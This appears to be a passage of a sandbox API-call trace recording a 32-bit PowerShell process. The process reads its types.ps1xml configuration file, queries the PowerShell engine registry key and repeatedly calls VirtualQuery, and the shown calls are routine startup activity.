	[0222.993] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xae574, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0222.993] GetLastError () returned 0x0
	[0223.140] GetSystemInfo (in: lpSystemInfo=0xae1b8 | out: lpSystemInfo=0xae1b8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0223.141] VirtualQuery (in: lpAddress=0xad974, lpBuffer=0xae974, dwLength=0x1c | out: lpBuffer=0xae974*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0223.272] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xae54c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0223.272] GetLastError () returned 0x0
	[0223.272] SetErrorMode (uMode=0x1) returned 0x1
	[0223.272] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x360
	[0223.272] GetLastError () returned 0x0
	[0223.272] GetFileType (hFile=0x360) returned 0x1
	[0223.272] SetErrorMode (uMode=0x1) returned 0x1
	[0223.272] GetFileType (hFile=0x360) returned 0x1
	[0223.272] ReadFile (in: hFile=0x360, lpBuffer=0x2a82a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xaeab4, lpOverlapped=0x0 | out: lpBuffer=0x2a82a00*, lpNumberOfBytesRead=0xaeab4*=0x1000, lpOverlapped=0x0) returned 1
	[0223.273] GetLastError () returned 0x0
	[0223.273] ReadFile (in: hFile=0x360, lpBuffer=0x2a82a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xaeab4, lpOverlapped=0x0 | out: lpBuffer=0x2a82a00*, lpNumberOfBytesRead=0xaeab4*=0x1000, lpOverlapped=0x0) returned 1
	[0223.274] GetLastError () returned 0x0
	[0223.274] ReadFile (in: hFile=0x360, lpBuffer=0x2a82a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xaeab4, lpOverlapped=0x0 | out: lpBuffer=0x2a82a00*, lpNumberOfBytesRead=0xaeab4*=0x1000, lpOverlapped=0x0) returned 1
	[0223.274] GetLastError () returned 0x0
	[0223.275] ReadFile (in: hFile=0x360, lpBuffer=0x2a82a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xaeab4, lpOverlapped=0x0 | out: lpBuffer=0x2a82a00*, lpNumberOfBytesRead=0xaeab4*=0x1000, lpOverlapped=0x0) returned 1
	[0223.275] GetLastError () returned 0x0
	[0223.275] ReadFile (in: hFile=0x360, lpBuffer=0x2a82a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xaeab4, lpOverlapped=0x0 | out: lpBuffer=0x2a82a00*, lpNumberOfBytesRead=0xaeab4*=0x1000, lpOverlapped=0x0) returned 1
	[0223.275] GetLastError () returned 0x0
	[0223.276] ReadFile (in: hFile=0x360, lpBuffer=0x2a82a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xaeab4, lpOverlapped=0x0 | out: lpBuffer=0x2a82a00*, lpNumberOfBytesRead=0xaeab4*=0x1000, lpOverlapped=0x0) returned 1
	[0223.276] GetLastError () returned 0x0
	[0223.276] ReadFile (in: hFile=0x360, lpBuffer=0x2a82a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xaeab4, lpOverlapped=0x0 | out: lpBuffer=0x2a82a00*, lpNumberOfBytesRead=0xaeab4*=0x1000, lpOverlapped=0x0) returned 1
	[0223.276] GetLastError () returned 0x0
	[0223.276] ReadFile (in: hFile=0x360, lpBuffer=0x2a82a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xaeab4, lpOverlapped=0x0 | out: lpBuffer=0x2a82a00*, lpNumberOfBytesRead=0xaeab4*=0x1000, lpOverlapped=0x0) returned 1
	[0223.276] GetLastError () returned 0x0
	[0223.277] ReadFile (in: hFile=0x360, lpBuffer=0x2a82a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xaeab4, lpOverlapped=0x0 | out: lpBuffer=0x2a82a00*, lpNumberOfBytesRead=0xaeab4*=0x1000, lpOverlapped=0x0) returned 1
	[0223.277] GetLastError () returned 0x0
	[0223.278] ReadFile (in: hFile=0x360, lpBuffer=0x2a82a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xaeab4, lpOverlapped=0x0 | out: lpBuffer=0x2a82a00*, lpNumberOfBytesRead=0xaeab4*=0x1000, lpOverlapped=0x0) returned 1
	[0223.278] GetLastError () returned 0x0
	[0223.278] ReadFile (in: hFile=0x360, lpBuffer=0x2a82a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xaeab4, lpOverlapped=0x0 | out: lpBuffer=0x2a82a00*, lpNumberOfBytesRead=0xaeab4*=0x1000, lpOverlapped=0x0) returned 1
	[0223.278] GetLastError () returned 0x0
	[0223.278] ReadFile (in: hFile=0x360, lpBuffer=0x2a82a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xaeab4, lpOverlapped=0x0 | out: lpBuffer=0x2a82a00*, lpNumberOfBytesRead=0xaeab4*=0x1000, lpOverlapped=0x0) returned 1
	[0223.279] GetLastError () returned 0x0
	[0223.279] ReadFile (in: hFile=0x360, lpBuffer=0x2a82a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xaeab4, lpOverlapped=0x0 | out: lpBuffer=0x2a82a00*, lpNumberOfBytesRead=0xaeab4*=0x1000, lpOverlapped=0x0) returned 1
	[0223.279] GetLastError () returned 0x0
	[0223.279] ReadFile (in: hFile=0x360, lpBuffer=0x2a82a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xaeab4, lpOverlapped=0x0 | out: lpBuffer=0x2a82a00*, lpNumberOfBytesRead=0xaeab4*=0x1000, lpOverlapped=0x0) returned 1
	[0223.279] GetLastError () returned 0x0
	[0223.279] ReadFile (in: hFile=0x360, lpBuffer=0x2a82a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xaeab4, lpOverlapped=0x0 | out: lpBuffer=0x2a82a00*, lpNumberOfBytesRead=0xaeab4*=0x1000, lpOverlapped=0x0) returned 1
	[0223.279] GetLastError () returned 0x0
	[0223.279] ReadFile (in: hFile=0x360, lpBuffer=0x2a82a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xaeab4, lpOverlapped=0x0 | out: lpBuffer=0x2a82a00*, lpNumberOfBytesRead=0xaeab4*=0x1000, lpOverlapped=0x0) returned 1
	[0223.280] GetLastError () returned 0x0
	[0223.280] ReadFile (in: hFile=0x360, lpBuffer=0x2a82a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xaeab4, lpOverlapped=0x0 | out: lpBuffer=0x2a82a00*, lpNumberOfBytesRead=0xaeab4*=0x1000, lpOverlapped=0x0) returned 1
	[0223.280] GetLastError () returned 0x0
	[0223.283] ReadFile (in: hFile=0x360, lpBuffer=0x2a82a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xaeab4, lpOverlapped=0x0 | out: lpBuffer=0x2a82a00*, lpNumberOfBytesRead=0xaeab4*=0x1000, lpOverlapped=0x0) returned 1
	[0223.283] GetLastError () returned 0x0
	[0223.283] ReadFile (in: hFile=0x360, lpBuffer=0x2a82a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xaeab4, lpOverlapped=0x0 | out: lpBuffer=0x2a82a00*, lpNumberOfBytesRead=0xaeab4*=0x1000, lpOverlapped=0x0) returned 1
	[0223.283] GetLastError () returned 0x0
	[0223.283] ReadFile (in: hFile=0x360, lpBuffer=0x2a82a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xaeab4, lpOverlapped=0x0 | out: lpBuffer=0x2a82a00*, lpNumberOfBytesRead=0xaeab4*=0x1000, lpOverlapped=0x0) returned 1
	[0223.377] GetLastError () returned 0x0
	[0223.378] ReadFile (in: hFile=0x360, lpBuffer=0x2a82a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xaeab4, lpOverlapped=0x0 | out: lpBuffer=0x2a82a00*, lpNumberOfBytesRead=0xaeab4*=0x1000, lpOverlapped=0x0) returned 1
	[0223.378] GetLastError () returned 0x0
	[0223.378] ReadFile (in: hFile=0x360, lpBuffer=0x2a82a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xaeab4, lpOverlapped=0x0 | out: lpBuffer=0x2a82a00*, lpNumberOfBytesRead=0xaeab4*=0x1000, lpOverlapped=0x0) returned 1
	[0223.378] GetLastError () returned 0x0
	[0223.378] ReadFile (in: hFile=0x360, lpBuffer=0x2a82a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xaeab4, lpOverlapped=0x0 | out: lpBuffer=0x2a82a00*, lpNumberOfBytesRead=0xaeab4*=0x1000, lpOverlapped=0x0) returned 1
	[0223.378] GetLastError () returned 0x0
	[0223.378] ReadFile (in: hFile=0x360, lpBuffer=0x2a82a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xaeab4, lpOverlapped=0x0 | out: lpBuffer=0x2a82a00*, lpNumberOfBytesRead=0xaeab4*=0x1000, lpOverlapped=0x0) returned 1
	[0223.379] GetLastError () returned 0x0
	[0223.379] ReadFile (in: hFile=0x360, lpBuffer=0x2a82a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xaeab4, lpOverlapped=0x0 | out: lpBuffer=0x2a82a00*, lpNumberOfBytesRead=0xaeab4*=0x1000, lpOverlapped=0x0) returned 1
	[0223.379] GetLastError () returned 0x0
	[0223.379] ReadFile (in: hFile=0x360, lpBuffer=0x2a82a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xaeab4, lpOverlapped=0x0 | out: lpBuffer=0x2a82a00*, lpNumberOfBytesRead=0xaeab4*=0x1000, lpOverlapped=0x0) returned 1
	[0223.379] GetLastError () returned 0x0
	[0223.379] ReadFile (in: hFile=0x360, lpBuffer=0x2a82a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xaeab4, lpOverlapped=0x0 | out: lpBuffer=0x2a82a00*, lpNumberOfBytesRead=0xaeab4*=0x1000, lpOverlapped=0x0) returned 1
	[0223.379] GetLastError () returned 0x0
	[0223.380] ReadFile (in: hFile=0x360, lpBuffer=0x2a82a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xaeab4, lpOverlapped=0x0 | out: lpBuffer=0x2a82a00*, lpNumberOfBytesRead=0xaeab4*=0x1000, lpOverlapped=0x0) returned 1
	[0223.380] GetLastError () returned 0x0
	[0223.380] ReadFile (in: hFile=0x360, lpBuffer=0x2a82a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xaeab4, lpOverlapped=0x0 | out: lpBuffer=0x2a82a00*, lpNumberOfBytesRead=0xaeab4*=0x1000, lpOverlapped=0x0) returned 1
	[0223.380] GetLastError () returned 0x0
	[0223.380] ReadFile (in: hFile=0x360, lpBuffer=0x2a82a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xaeab4, lpOverlapped=0x0 | out: lpBuffer=0x2a82a00*, lpNumberOfBytesRead=0xaeab4*=0x1000, lpOverlapped=0x0) returned 1
	[0223.380] GetLastError () returned 0x0
	[0223.380] ReadFile (in: hFile=0x360, lpBuffer=0x2a82a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xaeab4, lpOverlapped=0x0 | out: lpBuffer=0x2a82a00*, lpNumberOfBytesRead=0xaeab4*=0x1000, lpOverlapped=0x0) returned 1
	[0223.380] GetLastError () returned 0x0
	[0223.381] ReadFile (in: hFile=0x360, lpBuffer=0x2a82a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xaeab4, lpOverlapped=0x0 | out: lpBuffer=0x2a82a00*, lpNumberOfBytesRead=0xaeab4*=0x1000, lpOverlapped=0x0) returned 1
	[0223.381] GetLastError () returned 0x0
	[0223.381] ReadFile (in: hFile=0x360, lpBuffer=0x2a82a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xaeab4, lpOverlapped=0x0 | out: lpBuffer=0x2a82a00*, lpNumberOfBytesRead=0xaeab4*=0x1000, lpOverlapped=0x0) returned 1
	[0223.381] GetLastError () returned 0x0
	[0223.386] ReadFile (in: hFile=0x360, lpBuffer=0x2a82a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xaeab4, lpOverlapped=0x0 | out: lpBuffer=0x2a82a00*, lpNumberOfBytesRead=0xaeab4*=0x1000, lpOverlapped=0x0) returned 1
	[0223.386] GetLastError () returned 0x0
	[0223.386] ReadFile (in: hFile=0x360, lpBuffer=0x2a82a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xaeab4, lpOverlapped=0x0 | out: lpBuffer=0x2a82a00*, lpNumberOfBytesRead=0xaeab4*=0x1000, lpOverlapped=0x0) returned 1
	[0223.386] GetLastError () returned 0x0
	[0223.386] ReadFile (in: hFile=0x360, lpBuffer=0x2a82a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xaeab4, lpOverlapped=0x0 | out: lpBuffer=0x2a82a00*, lpNumberOfBytesRead=0xaeab4*=0x1000, lpOverlapped=0x0) returned 1
	[0223.387] GetLastError () returned 0x0
	[0223.387] ReadFile (in: hFile=0x360, lpBuffer=0x2a82a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xaeab4, lpOverlapped=0x0 | out: lpBuffer=0x2a82a00*, lpNumberOfBytesRead=0xaeab4*=0x1000, lpOverlapped=0x0) returned 1
	[0223.387] GetLastError () returned 0x0
	[0223.387] ReadFile (in: hFile=0x360, lpBuffer=0x2a82a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xaeab4, lpOverlapped=0x0 | out: lpBuffer=0x2a82a00*, lpNumberOfBytesRead=0xaeab4*=0x1000, lpOverlapped=0x0) returned 1
	[0223.387] GetLastError () returned 0x0
	[0223.387] ReadFile (in: hFile=0x360, lpBuffer=0x2a82a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xaeab4, lpOverlapped=0x0 | out: lpBuffer=0x2a82a00*, lpNumberOfBytesRead=0xaeab4*=0x1000, lpOverlapped=0x0) returned 1
	[0223.387] GetLastError () returned 0x0
	[0223.387] ReadFile (in: hFile=0x360, lpBuffer=0x2a82a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xaeab4, lpOverlapped=0x0 | out: lpBuffer=0x2a82a00*, lpNumberOfBytesRead=0xaeab4*=0x1000, lpOverlapped=0x0) returned 1
	[0223.388] GetLastError () returned 0x0
	[0223.388] ReadFile (in: hFile=0x360, lpBuffer=0x2a82a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xaeab4, lpOverlapped=0x0 | out: lpBuffer=0x2a82a00*, lpNumberOfBytesRead=0xaeab4*=0x1000, lpOverlapped=0x0) returned 1
	[0223.388] GetLastError () returned 0x0
	[0223.388] ReadFile (in: hFile=0x360, lpBuffer=0x2a82a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xaeab4, lpOverlapped=0x0 | out: lpBuffer=0x2a82a00*, lpNumberOfBytesRead=0xaeab4*=0x1b4, lpOverlapped=0x0) returned 1
	[0223.388] GetLastError () returned 0x0
	[0223.388] ReadFile (in: hFile=0x360, lpBuffer=0x2a82a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xaeab4, lpOverlapped=0x0 | out: lpBuffer=0x2a82a00*, lpNumberOfBytesRead=0xaeab4*=0x0, lpOverlapped=0x0) returned 1
	[0223.388] GetLastError () returned 0x0
	[0223.388] CloseHandle (hObject=0x360) returned 1
	[0223.389] GetLastError () returned 0x0
	[0223.389] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xae614, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0223.389] GetLastError () returned 0x0
	[0223.389] SetErrorMode (uMode=0x1) returned 0x1
	[0223.389] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2aa3290 | out: lpFileInformation=0x2aa3290*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7c2d31c, ftCreationTime.dwHighDateTime=0x1c9ea11, ftLastAccessTime.dwLowDateTime=0xd7c2d31c, ftLastAccessTime.dwHighDateTime=0x1c9ea11, ftLastWriteTime.dwLowDateTime=0xd7c5347c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0223.389] GetLastError () returned 0x0
	[0223.389] SetErrorMode (uMode=0x1) returned 0x1
	[0223.389] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xae5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0223.389] GetLastError () returned 0x0
	[0223.389] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xaea38 | out: phkResult=0xaea38*=0x360) returned 0x0
	[0223.389] RegQueryValueExW (in: hKey=0x360, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xaea80, lpData=0x0, lpcbData=0xaea7c*=0x0 | out: lpType=0xaea80*=0x1, lpData=0x0, lpcbData=0xaea7c*=0x56) returned 0x0
	[0223.389] RegQueryValueExW (in: hKey=0x360, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xaea80, lpData=0x3582a0, lpcbData=0xaea7c*=0x56 | out: lpType=0xaea80*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0xaea7c*=0x56) returned 0x0
	[0223.390] RegCloseKey (hKey=0x360) returned 0x0
	[0223.390] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xae5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0223.390] GetLastError () returned 0x0
	[0223.390] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xae574, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0223.390] GetLastError () returned 0x0
	[0223.902] VirtualQuery (in: lpAddress=0xad974, lpBuffer=0xae974, dwLength=0x1c | out: lpBuffer=0xae974*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.017] VirtualQuery (in: lpAddress=0xad974, lpBuffer=0xae974, dwLength=0x1c | out: lpBuffer=0xae974*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.020] VirtualQuery (in: lpAddress=0xad974, lpBuffer=0xae974, dwLength=0x1c | out: lpBuffer=0xae974*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.020] VirtualQuery (in: lpAddress=0xad974, lpBuffer=0xae974, dwLength=0x1c | out: lpBuffer=0xae974*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.021] VirtualQuery (in: lpAddress=0xad974, lpBuffer=0xae974, dwLength=0x1c | out: lpBuffer=0xae974*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.021] VirtualQuery (in: lpAddress=0xad974, lpBuffer=0xae974, dwLength=0x1c | out: lpBuffer=0xae974*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.023] VirtualQuery (in: lpAddress=0xad974, lpBuffer=0xae974, dwLength=0x1c | out: lpBuffer=0xae974*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.028] VirtualQuery (in: lpAddress=0xad974, lpBuffer=0xae974, dwLength=0x1c | out: lpBuffer=0xae974*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.049] VirtualQuery (in: lpAddress=0xad974, lpBuffer=0xae974, dwLength=0x1c | out: lpBuffer=0xae974*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.049] VirtualQuery (in: lpAddress=0xad974, lpBuffer=0xae974, dwLength=0x1c | out: lpBuffer=0xae974*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.050] VirtualQuery (in: lpAddress=0xad974, lpBuffer=0xae974, dwLength=0x1c | out: lpBuffer=0xae974*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.050] VirtualQuery (in: lpAddress=0xad974, lpBuffer=0xae974, dwLength=0x1c | out: lpBuffer=0xae974*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.147] VirtualQuery (in: lpAddress=0xad974, lpBuffer=0xae974, dwLength=0x1c | out: lpBuffer=0xae974*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.148] VirtualQuery (in: lpAddress=0xad974, lpBuffer=0xae974, dwLength=0x1c | out: lpBuffer=0xae974*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.148] VirtualQuery (in: lpAddress=0xad974, lpBuffer=0xae974, dwLength=0x1c | out: lpBuffer=0xae974*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.148] VirtualQuery (in: lpAddress=0xad974, lpBuffer=0xae974, dwLength=0x1c | out: lpBuffer=0xae974*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.156] VirtualQuery (in: lpAddress=0xad974, lpBuffer=0xae974, dwLength=0x1c | out: lpBuffer=0xae974*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.164] VirtualQuery (in: lpAddress=0xad974, lpBuffer=0xae974, dwLength=0x1c | out: lpBuffer=0xae974*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.165] VirtualQuery (in: lpAddress=0xad974, lpBuffer=0xae974, dwLength=0x1c | out: lpBuffer=0xae974*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.166] VirtualQuery (in: lpAddress=0xad974, lpBuffer=0xae974, dwLength=0x1c | out: lpBuffer=0xae974*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.166] VirtualQuery (in: lpAddress=0xad974, lpBuffer=0xae974, dwLength=0x1c | out: lpBuffer=0xae974*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.167] VirtualQuery (in: lpAddress=0xad974, lpBuffer=0xae974, dwLength=0x1c | out: lpBuffer=0xae974*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.168] VirtualQuery (in: lpAddress=0xad974, lpBuffer=0xae974, dwLength=0x1c | out: lpBuffer=0xae974*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.168] VirtualQuery (in: lpAddress=0xad974, lpBuffer=0xae974, dwLength=0x1c | out: lpBuffer=0xae974*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.168] VirtualQuery (in: lpAddress=0xad974, lpBuffer=0xae974, dwLength=0x1c | out: lpBuffer=0xae974*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.169] VirtualQuery (in: lpAddress=0xad974, lpBuffer=0xae974, dwLength=0x1c | out: lpBuffer=0xae974*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.169] VirtualQuery (in: lpAddress=0xad974, lpBuffer=0xae974, dwLength=0x1c | out: lpBuffer=0xae974*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.169] VirtualQuery (in: lpAddress=0xad974, lpBuffer=0xae974, dwLength=0x1c | out: lpBuffer=0xae974*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.170] VirtualQuery (in: lpAddress=0xad974, lpBuffer=0xae974, dwLength=0x1c | out: lpBuffer=0xae974*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.170] VirtualQuery (in: lpAddress=0xad974, lpBuffer=0xae974, dwLength=0x1c | out: lpBuffer=0xae974*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.172] VirtualQuery (in: lpAddress=0xad974, lpBuffer=0xae974, dwLength=0x1c | out: lpBuffer=0xae974*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.176] VirtualQuery (in: lpAddress=0xad978, lpBuffer=0xae978, dwLength=0x1c | out: lpBuffer=0xae978*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.177] VirtualQuery (in: lpAddress=0xad978, lpBuffer=0xae978, dwLength=0x1c | out: lpBuffer=0xae978*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
